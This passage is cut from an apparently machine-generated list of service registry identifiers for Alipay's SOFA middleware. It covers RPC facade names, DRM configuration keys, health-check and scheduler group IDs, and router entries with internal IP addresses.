ashier.service.facade.UserSwitchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.jarguard.facade.DoomFlowService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promox.facade.crowd.CrowdQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.service.retry.task.generate.GeneratorOrderDRMResource.batchSize,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.insclaiminvestprod.facade.assess.audit.AssessAuditQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.paymentmng:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableHeadCarry,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilesearch.biz.rpc.service.MrpcSearchFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.erecon.common.service.facade.fund.api.item.ReconcileItemService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.alhub.facade.event.DriveLogFacade.getDriveLogList:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mobilegeocoding:name=com.alipay.mobilegeocoding.core.service.drm.DistrictVersionResource.dataLoadRetryTimes,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.zcbprod.common.service.facade.transfer.TransferQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sdaclouddevice.facade.ext.DeviceExtFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.fc.operator.common.service.facade.PermissionTreeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.vouchercore.facade.api.voucher.VoucherConsultFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ordermng:name=com.alipay.ordermng.common.util.drm.OrdermngDegradeDRM.consultInterTradeSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pointcore.common.mpoint.facade.MpointQuotaQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insttrade:name=midas.record.MidasRecordSwitchDRMControl.subSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.mybank.dchain.common.facade.api.comparam.DistrictQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.cpm.drm.CpmSasControlDrmResource.consumeOverTimeRange,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.zqueue.server.sigma-job-5fe07fbfd8ce5803a4a182cf-random-m46hs-25mz9.drm70#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.sofa.rpc.elastic.ElasticService:1.0:pvsofabootserver@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.prodmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.customJsonSuffixEndWith,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","cn.com.antcloud.acpmpcore.common.service.facade.ProjectFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mapitool.facade.api.ApiManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ireplay.common.service.facade.emulator.EmulationTaskManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.246.127#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.cfmng:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.loadTestIslandConditionStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.platform.schedule.concurrent.execute.Executer:1.0:aiceScheduleExecutor@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.security.cds.facade.RuleCheckerRunFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.agent.AgentOperationFacade:1.0:antacl@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchasset.common.service.facade.ceres.AssetCeresPrCreateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.custcenter.service.antg.facade.accesstoken.AgATKResourceItemManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ipsponsorprod.common.service.facade.api.cashback.GoodsDetailSearchGzoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.customerTairCache.refresh,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fintradecenter.common.service.facade.test.StructuredDepositsDataLoaderTest:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.seekers.facade.spis.EntityDiagnosisService:1.0:troublehunter_appOpsSearchService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.filebridge.service.facade.api.FileSftpServerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fincommonbff:name=com.alipay.guardian.client.sofa.drm.GuardianDrm.guardianConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","cn.com.antcloud.acmcscore.facade.ServiceRecordFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mobileorderprod.service.facade.tenant.TenantCategoryManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@csbizcenter#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.trsbrain.common.service.facade.spi.BasicSelfCureServiceFacade:1.0:trsbrain-infra@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchstm.common.service.facade.mart.facade.AmActivityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iotcore.spi.RpcSpi:1.0:mdeviceprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@unitestcenter#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.assettrans.core.service.migrate.faasst.cache.FaAssetRouteInvokeCache:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finstore.common.service.integration.tair.czone.CzoneTairClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pointcore.common.manage.facade.BudgetLibManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.infostudio.facade.mng.category.CategoryMngService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundcore.msgnotify.service.facade.AppMsgSenderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.dweg:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.vmEmergencyEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.insttrade:name=com.alipay.cif.model.cache.CifCOControlSwitch.checkArgConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.almcenter.service.facade.api.clearing.ClearingStrategyManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.120.73#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.appstore.common.service.facade.commodity.MerchantCommodityQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rtss.common.service.facade.easytree.NodeInfoAdminService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securityassistant.common.service.facade.selfrelieving.FraudRecoverMoneyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.client.SystemAppInvokeService:1.0:as@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.poscore:name=com.alipay.zdal.ldc.tair.customerv2_dest.cacheEngineUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.platform.schedule.concurrent.execute.Executer:1.0:receivableCRCheck@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cifin:name=com.alipay.cifin.core.service.component.drm.LDCCacheSyncSwitchDrmResource.isSwitchTosyncGlobalCache,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA_PRC_TRANSMIT_ANTLESCENTER#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.portrait.facade.UserPortraitQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.cashier.common.service.facade.spi.SyncPayResultService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.withdraw.api.CancelContractBacsService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.trsbrain.common.service.facade.spi.BizSelfCureServiceFacade:1.0:ZEROX@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbcraftsman.common.facade.backend.TaskModifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cxbiz.oneshop.core.businessservice.api.GetRecommendedShopApi:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csdatamng.common.service.facade.api.AssetService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.publiccore.common.service.facade.account.PublicActiveClassFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchportalcore.common.service.uqc.inner.UQCInnerExecuteServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.scsupport.common.service.facade.config.SeasonManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.jiuzhou.facade.dr.IdcDrSwitchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditmng.common.service.WorkOrderPrescriptionManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.zpaas.zappinfo.facade.query.PodUnitMemberQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.pcreditquery.common.api.PcreditQuerySignInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.38.50.74#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finfundguardian.common.facade.service.RiskControllQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:bcinteractivepoints@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_mztest001#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_100.83.97.167#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Sub_Servers_TP_C_CREDIT#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.socialportal.facade.digitalarmy.ExpandJobFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iprocess.sip.action.Action:1.0:taskBlockAction@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.wkprod.common.service.facade.pay.WkPaymentService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.aliloan.ecmobile.service.LoanFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:ipaymentmng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.177.32#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.poscore:name=com.alipay.poscore.common.service.integration.drm.impl.DrmResourceTrigger.openNewModeSaveAgreement,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.inshealthmarket.common.service.facade.service.TikTokFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchiswisdom.decision.common.service.facade.api.decisionversion.DecisionVersionOperationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.trsbrain.common.service.facade.spi.BizSelfCureServiceFacade:1.0:limitCenterSelfCure@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csvoice.service.facade.api.ProblemClassService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.echo:name=com.alipay.echo.platform.client.drm.EchoPlaybackConfigDrm.playbackTask,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.fcbuservice.common.service.facade.AuthFacade:1.0:antzhixin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.aip.profit.schedule.calculate.drm.ProfitCalculateDRMResource.fundCodes,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.codprod.common.service.facade.logistics.facade.LogisticsWaybillQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.secucommunity.user.SecuUserManager:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbcontent.common.service.facade.api.content.ContentObjectRelationManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcloanprod.common.service.facade.service.lend.LendAcceptQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zpaas.zappinfo.facade.query.WorkspaceGroupQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.crmhome.common.service.facade.api.equipment.EquipmentDownloadFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.hypTair.nativeRuleZones,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilelbs.common.service.facade.ip.IpLocateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.201.224#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finfundprod.common.service.facade.FundVirtualTradeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_ACCOUNTPROD#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.event.api.input.EventReceiverService:1.0:SL__TP_F_SC_EC_PROMOKERNEL_TBASE2DB_COUNTINFO_SYNC_FUNC@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.159.109#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobiletms.client.facade.TemplateClientService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.xview.core.common.facade.CacheQueryProviderService:1.0:giftprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inscommunity.common.service.facade.ZytCaseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dpc.dasbi.common.service.facade.metric.MetricInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dss.endpoint.rest.facade.InstanceFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.paymentmngTairCache.ldcTairWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA_PRC_TRANSMIT_FINCORECHECK#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.218.5#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.lifemng:name=com.alipay.routeclient.DefaultRouteCoordinator.idcDomainScope,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cxbiz.membersolution.common.service.facade.api.promotion.MemberPromotionStatisticsQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcmerchantprod.facade.hbpoint.HbPointValidateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antmember.common.service.facade.goldeneye.acceptance.GoldenEyeAcceptanceService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csshield.service.facade.mng.StandardCoverageMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbtemplate.common.service.facade.manage.AbTestManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ccdc.common.service.facade.CardInfoService:1.0:fccustprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.zdatacontextLoadTestTBaseCache.nativeRuleZones,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.tairmanager.application.service.monitor.TairMonitorService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mdistinguish.common.service.facade.ticket.FalconTicketRecServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openeco.facade.camprules.CampRuleConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.depcore.service.facade.query.QueryVtrlCardInfoService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.accordercore.api.DepositAndTransferService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.customscenter:name=com.alipay.guardian.client.sofa.drm.GuardianDrm.guardianConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.158.43.138#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","SOFA-SCHEDULER-S-S-zqualitywallecore-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.finfocore:name=com.alipay.cif.client.drm.AntPassportSwitcher.expireTime,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilesecurity.common.service.api.password.PasswordFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zqueue.client.flowctrl61#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.csguide.service.facade.api.PageTemplateRelationService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.cpm.CapitalPlanManageConfigDrmImpl.nextUpdateTimeDiffMinutes,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.zpaas.zappinfo.facade.query.MultiContainerQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.trade.ext.service.api.TradeConsultFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbomp.biz.shared.migration.service.QueryForMigService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.acctrans.facade.api.fundtrans.FundtransQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilecodec.common.spi.service.MobileCodecRouteService:1.0:mrmoaprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.Arch:name=com.alipay.kmi.drm.CertCacheRefresher.certName,version=1.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mmportal.common.service.facade.Mng3DModelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@openexprod#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.instasset.common.service.facade.partner.resource.LocationResourceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.36.5.12#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.csshield.service.facade.api.TaskServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","antia@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","openinsight@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finsecurityboss.biz.riskdetector.scheduler.ScheduleResultCountService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.routeclient.DefaultRouteCoordinator.rpcRouteByGroupWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.alphad.common.service.facade.feedback.api.IFrontApiFeedbackFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilesearch.common.service.facade.LifeMetaManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.finstore.common.service.facade.fundmanager.NewIssueFundInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.ifxposition.service.facade.ops.sql.OpsSqlManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bizrecon.facade.NettingRefundFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insttrade.common.service.facade.InstOrderQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.idatabus.common.service.facade.cumulate.IBusCumulateQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.filecore.service.facade.spi.FileMoveCallBack:1.0:instbill@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.riskservice.spi.OpsChngEventListener:1.0:rmcChngEventListener@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mapi.gateway.invoke.webservice.SysExterfaceInvokeService:1.0:kbadvert@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insttrade:name=com.alipay.insttrade.core.service.drm.AcsAccountDRM.strategy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:antsecscheduler@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.landlordgame.facade.api.RewardInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.testCacheTbase.serializationType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.afsc.common.service.thor.service.ThorPocFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.wishsavings.drm.impl.WishSavingsSysDRMResource.mobilegwUserSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antmember.common.service.facade.unicom.UnicomDataAwardService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yebcore.common.facade.service.YebDecisionServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dwsap.common.service.facade.cube.AlisisSqlMetaService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.mif.common.service.facade.LeadsTaskQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.common.facade.service.FeatureCalcService:1.0:antfeatureflow@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.lego.common.service.facade.data.DataOpenApiFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.prodcoreTairCache.nativeRuleZones,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.bizprodmng:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.xfireConnectionPerHostInMosn,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.codfund.common.service.facade.CODLogisticsChannelInfoFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.jcs.api.yarn.CommonAMService:1.0:internal@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:pcinstecoprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.gloantrade.common.service.facade.api.account.LoanAccountOpenFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.common.facade.service.FeatureCalcService:1.0:publicDomain_securityservice@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.253.37#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","SOFA-SCHEDULER-S-S_appxcore_service#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.chargefront:name=com.alipay.cif.model.cache.CifCOControlSwitch.readCustProp,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.publiccore.common.service.facade.h5secure.SecureHostWhiteListFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.154.196#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","SOFA-SCHEDULER-S-S-emcplan-schedule#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_30.23.248.58#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.publichome.common.service.facade.app.PublicAppAddTemporaryOperatorFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilerelation.common.service.facade.AlipayNameQueryCzoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appstore.common.service.facade.commodity.BumngCommodityIndustryCategoryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.crsociety.api.ParamQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:extend-request@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfas.facade.api.InwardPaymentManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cashierits.service.facade.ExecuteToolsService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csccmng.facade.api.CommonServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.kwlib:name=com.alipay.common.tracer.manage.TracerDrm.enableRpc2JvmDigest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finpwm:name=com.alipay.finpwm.aip.detail.drm.impl.AipExecutingPayConfigDRMResource.blockUserLevels,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.167.207.96#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:antrecluse@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.finsupport:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.ldcVipSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.platform.schedule.concurrent.load.Loader:1.0:groupFundsSettleLoader$1@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:drm-high-available@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antgroup.facade.SampleMessageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.antschedulerconsole.facade.JobGroupOpenApiFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.etetestcore:name=com.alipay.common.tracer.manage.TracerDrm.enableRpc2JvmDigest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.platform.schedule.concurrent.execute.Executer:1.0:EC_IRECON2_REVERSE_TASK@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securityops.common.service.client.spi.SecOpsChangeCallbackService:1.0:loginantzhixin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.30.209.246#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUT